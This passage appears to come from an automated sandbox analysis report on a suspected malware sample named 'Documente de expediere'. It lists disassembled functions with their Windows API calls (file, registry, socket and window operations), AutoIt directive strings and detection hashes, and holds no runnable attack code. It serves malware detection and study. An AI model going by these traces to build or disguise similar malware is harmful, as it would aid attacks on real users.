                                                APIs
                                                  • Part of subcall function 006F48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006F38D3,?), ref: 006F48C7
                                                  • Part of subcall function 006F48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006F38D3,?), ref: 006F48E0
                                                • lstrcmpiW.KERNEL32(?,?), ref: 006F38F3
                                                • _wcscmp.LIBCMT ref: 006F390F
                                                • MoveFileW.KERNEL32(?,?), ref: 006F3927
                                                • _wcscat.LIBCMT ref: 006F396F
                                                • SHFileOperationW.SHELL32(?), ref: 006F39DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 1377345388-1173974218
                                                • Opcode ID: dac6eee3d2512d94bab7d1f7f6f0ab440dc0d04cc18f6fc691c2f03eafb92372
                                                • Instruction ID: 63e562258fb067e4815ca59b7122c5cf6c704a93e41eb7ed7e055af3d30edd8a
                                                • Opcode Fuzzy Hash: dac6eee3d2512d94bab7d1f7f6f0ab440dc0d04cc18f6fc691c2f03eafb92372
                                                • Instruction Fuzzy Hash: F14193B150C3489EC791EF64C4419EFB7EDAF89340F00192EF599C3251EA74D689C756
                                                Function 00717500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00717519
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007175C0
                                                • IsMenu.USER32(?), ref: 007175D8
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00717620
                                                • DrawMenuBar.USER32 ref: 00717633
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                • String ID: 0
                                                • API String ID: 3866635326-4108050209
                                                • Opcode ID: a136389ae80ce08ee70018eee1347b2ec397de48bd274aa7cc731cf66c076010
                                                • Instruction ID: 4d5f54d97c2f785ba934b89b032cf0be93b532df86619cb1051c6749c360c0d5
                                                • Opcode Fuzzy Hash: a136389ae80ce08ee70018eee1347b2ec397de48bd274aa7cc731cf66c076010
                                                • Instruction Fuzzy Hash: 99412775A04609EFDB24DF58D884EDABBF9FF18350F048129E95997290D738AD90CFA0
                                                Function 0071122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0071125C
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00711286
                                                • FreeLibrary.KERNEL32(00000000), ref: 0071133D
                                                  • Part of subcall function 0071122D: RegCloseKey.ADVAPI32(?), ref: 007112A3
                                                  • Part of subcall function 0071122D: FreeLibrary.KERNEL32(?), ref: 007112F5
                                                  • Part of subcall function 0071122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00711318
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 007112E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 395352322-0
                                                • Opcode ID: 94a30314a0c9ca7a0e2fd6c4ddd3ae1cc10e9f5ab11b38b293773106433e874b
                                                • Instruction ID: 79444ae885b37763cde2d9409ac8c9576218aebb464771fe91549e2fe46b2ebe
                                                • Opcode Fuzzy Hash: 94a30314a0c9ca7a0e2fd6c4ddd3ae1cc10e9f5ab11b38b293773106433e874b
                                                • Instruction Fuzzy Hash: 09314D71A01119FFDB14DB98DC89AFEB7BCEF08300F404169E611E6181EA789E859BA4
                                                Function 0071653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0071655B
                                                • GetWindowLongW.USER32(01654CF0,000000F0), ref: 0071658E
                                                • GetWindowLongW.USER32(01654CF0,000000F0), ref: 007165C3
                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007165F5
                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0071661F
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00716630
                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0071664A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LongWindow$MessageSend
                                                • String ID:
                                                • API String ID: 2178440468-0
                                                • Opcode ID: 033b0919577c2555b7bf27774bc965ecde2a1315329cd715574d6efabf21e61d
                                                • Instruction ID: e3e785c92807cce78868dfa980aed81addbe565167df63d1d8e74d33227bc22a
                                                • Opcode Fuzzy Hash: 033b0919577c2555b7bf27774bc965ecde2a1315329cd715574d6efabf21e61d
                                                • Instruction Fuzzy Hash: E631F230604250AFDB20CF1CDC85F953BE2FB4A751F1982A8F5118B2F6CB6AE890DB55
                                                Function 00706486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007080A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007080CB
                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007064D9
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007064E8
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00706521
                                                • connect.WSOCK32(00000000,?,00000010), ref: 0070652A
                                                • WSAGetLastError.WSOCK32 ref: 00706534
                                                • closesocket.WSOCK32(00000000), ref: 0070655D
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00706576
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 910771015-0
                                                • Opcode ID: 0b580cbc25450f3821a2b7678d6cc257b02371a7cd8b9e88514fc3c4c26cdece
                                                • Instruction ID: c03b59d139dff177c98d063b3e90185be6dfbd879ca8d521ce1012e990b28228
                                                • Opcode Fuzzy Hash: 0b580cbc25450f3821a2b7678d6cc257b02371a7cd8b9e88514fc3c4c26cdece
                                                • Instruction Fuzzy Hash: A1319031600218EFDB109F28CC95BBE7BEDEB44724F04812DF909972D1CB78A915CA65
                                                Function 006EE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EE0FA
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006EE120
                                                • SysAllocString.OLEAUT32(00000000), ref: 006EE123
                                                • SysAllocString.OLEAUT32 ref: 006EE144
                                                • SysFreeString.OLEAUT32 ref: 006EE14D
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 006EE167
                                                • SysAllocString.OLEAUT32(?), ref: 006EE175
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 3d4f9e244bbc5188b7f81ee4649c435fee38738f36a6150629a47c575bbb0fff
                                                • Instruction ID: 0a3b5d0839f658ada92f88bb7244fb175fccd1a16b847fc940bfe92a060f9fce
                                                • Opcode Fuzzy Hash: 3d4f9e244bbc5188b7f81ee4649c435fee38738f36a6150629a47c575bbb0fff
                                                • Instruction Fuzzy Hash: B221A435205248AFAB10DFADDC88DEB77EDEB09760B10C125F914CB2A0DA75DC818B64
                                                Function 006EFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: f2b555f978cc4d1445fa7e078fd078f2b5718eb6dc827ae9558c426e587777e8
                                                • Instruction ID: 6f34beb6a40ea1329a93c129f0f367be3de911442106b5b749ebc4a863f3dcea
                                                • Opcode Fuzzy Hash: f2b555f978cc4d1445fa7e078fd078f2b5718eb6dc827ae9558c426e587777e8
                                                • Instruction Fuzzy Hash: 582128B22063A567D230B726DC12EE7739BEF65740F344439F88586282EB51A982D399
                                                Function 0071783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
                                                  • Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
                                                  • Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007178A1
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007178AE
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007178B9
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007178C8
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007178D4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: 532cec08cb5918b3d60a5be98ac60ec28d8c8ca355683a139312f7e9a5d6d36c
                                                • Instruction ID: 3e47220b21c561c0e290cb9f82c2de2a87dbbea5642833a2a6872a05137c8807
                                                • Opcode Fuzzy Hash: 532cec08cb5918b3d60a5be98ac60ec28d8c8ca355683a139312f7e9a5d6d36c
                                                • Instruction Fuzzy Hash: C011C4B2150219BFEF159F64CC85EE77F6DEF08768F018115FA04A60A0CB769C61DBA4
                                                Function 006B41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,006B4292,?), ref: 006B41E3
                                                • GetProcAddress.KERNEL32(00000000), ref: 006B41EA
                                                • EncodePointer.KERNEL32(00000000), ref: 006B41F6
                                                • DecodePointer.KERNEL32(00000001,006B4292,?), ref: 006B4213
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoInitialize$combase.dll
                                                • API String ID: 3489934621-340411864
                                                • Opcode ID: eab76d9dee8a76eb053d13d9dc02ee00c0406d36a998679c6429ac03d0f2228c
                                                • Instruction ID: 2ef69bc579e12e2b6d2180af9f49bec6d25690772c16129b388fc488a9ce0764
                                                • Opcode Fuzzy Hash: eab76d9dee8a76eb053d13d9dc02ee00c0406d36a998679c6429ac03d0f2228c
                                                • Instruction Fuzzy Hash: EAE0E5B4690B44AAEF605BB9EC09BD43AA6B720B0BF50C424F421D61E1DAFD40D19B08
                                                Function 006B429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006B41B8), ref: 006B42B8
                                                • GetProcAddress.KERNEL32(00000000), ref: 006B42BF
                                                • EncodePointer.KERNEL32(00000000), ref: 006B42CA
                                                • DecodePointer.KERNEL32(006B41B8), ref: 006B42E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoUninitialize$combase.dll
                                                • API String ID: 3489934621-2819208100
                                                • Opcode ID: 1e3626e2d0cd4d049c64fdd582ad9a3e44b3573e7c129195029e25254ece816a
                                                • Instruction ID: a453a8a7c749f461f2311eb9bfe20eb3a5def3218a375e24d5e6df3d86613790
                                                • Opcode Fuzzy Hash: 1e3626e2d0cd4d049c64fdd582ad9a3e44b3573e7c129195029e25254ece816a
                                                • Instruction Fuzzy Hash: EEE09AB8691714ABDA109B74EC09BC43EA5B724746F50C028F411D11E1CBBC8590AB1C
                                                Function 006F675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove$__itow__swprintf
                                                • String ID:
                                                • API String ID: 3253778849-0
                                                • Opcode ID: 2ac74d2e030658137b5ee0dcb8b02025e330d3075783c8fac3e9a08f62e1acb0
                                                • Instruction ID: cec4e567a2ae2a61c1441fa11a60ef07dceab5836c44ad963511e1789a876917
                                                • Opcode Fuzzy Hash: 2ac74d2e030658137b5ee0dcb8b02025e330d3075783c8fac3e9a08f62e1acb0
                                                • Instruction Fuzzy Hash: 1E61AD3050025EABDF51EF64CC92EFE37AAAF05308F04451DFA5A5B292DB349D41CBA8
                                                Function 0071046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 007110A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00710038,?,?), ref: 007110BC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710548
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00710588
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007105AB
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007105D4
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00710617
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00710624
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                • String ID:
                                                • API String ID: 4046560759-0
                                                • Opcode ID: f924cd777ff8dac0c5960da6c0db63eeee1236e36169cfcf0e10defb756edc12
                                                • Instruction ID: 7d812cd1e42c2a8c9d9ca06a6f74b149137b895c075faf5e667860b8e186997d
                                                • Opcode Fuzzy Hash: f924cd777ff8dac0c5960da6c0db63eeee1236e36169cfcf0e10defb756edc12
                                                • Instruction Fuzzy Hash: F9514C31108340AFCB14EF68C885EAABBEAFF88314F04491DF545971A1DB75E994CB96
                                                Function 00715A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenu.USER32(?), ref: 00715A82
                                                • GetMenuItemCount.USER32(00000000), ref: 00715AB9
                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00715AE1
                                                • GetMenuItemID.USER32(?,?), ref: 00715B50
                                                • GetSubMenu.USER32(?,?), ref: 00715B5E
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00715BAF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountMessagePostString
                                                • String ID:
                                                • API String ID: 650687236-0
                                                • Opcode ID: 9bf9993adf7039bbfc66d276e23203dd7267b860ac8f2dd42c66953e1010462f
                                                • Instruction ID: 1236f3fe6b34f6dd77681fa26458a4e7036de5de8a61eb738bfd800f10c566f8
                                                • Opcode Fuzzy Hash: 9bf9993adf7039bbfc66d276e23203dd7267b860ac8f2dd42c66953e1010462f
                                                • Instruction Fuzzy Hash: 5D517275A00615EFCF15EF68C845AEEBBB5EF48310F108469E916B7391CB34AE818B94
                                                Function 006EF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 006EF3F7
                                                • VariantClear.OLEAUT32(00000013), ref: 006EF469
                                                • VariantClear.OLEAUT32(00000000), ref: 006EF4C4
                                                • _memmove.LIBCMT ref: 006EF4EE
                                                • VariantClear.OLEAUT32(?), ref: 006EF53B
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006EF569
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                • String ID:
                                                • API String ID: 1101466143-0
                                                • Opcode ID: 35a92d3691741e665c8a5f873c970049502679bc06ce12f3b02767bfdbee7aa3
                                                • Instruction ID: 1b254e7506e7e9ab16ac57d91f515ca4aca6812f4b6fbd7848e4c3d844469a73
                                                • Opcode Fuzzy Hash: 35a92d3691741e665c8a5f873c970049502679bc06ce12f3b02767bfdbee7aa3
                                                • Instruction Fuzzy Hash: 135188B5A00249EFCB10CF58D884AAAB7F9FF5C314B158169ED49DB351D730E912CBA0
                                                Function 006F26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 006F2747
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2792
                                                • IsMenu.USER32(00000000), ref: 006F27B2
                                                • CreatePopupMenu.USER32 ref: 006F27E6
                                                • GetMenuItemCount.USER32(000000FF), ref: 006F2844
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006F2875
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                • String ID:
                                                • API String ID: 3311875123-0
                                                • Opcode ID: 4103d84ac72fc3d1e6af1ac6312c107999183f3de39c490c9441d12480c005cb
                                                • Instruction ID: 7b3f09d5cfd59009c9fc5a64edec321f0044b32293d6bbc1621d203ce57f7a53
                                                • Opcode Fuzzy Hash: 4103d84ac72fc3d1e6af1ac6312c107999183f3de39c490c9441d12480c005cb
                                                • Instruction Fuzzy Hash: BC519E70A0124BEBDF24CF68C898AFEBBF6AF45354F108169E6259B2D0D7709948CF51
                                                Function 00691765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0069179A
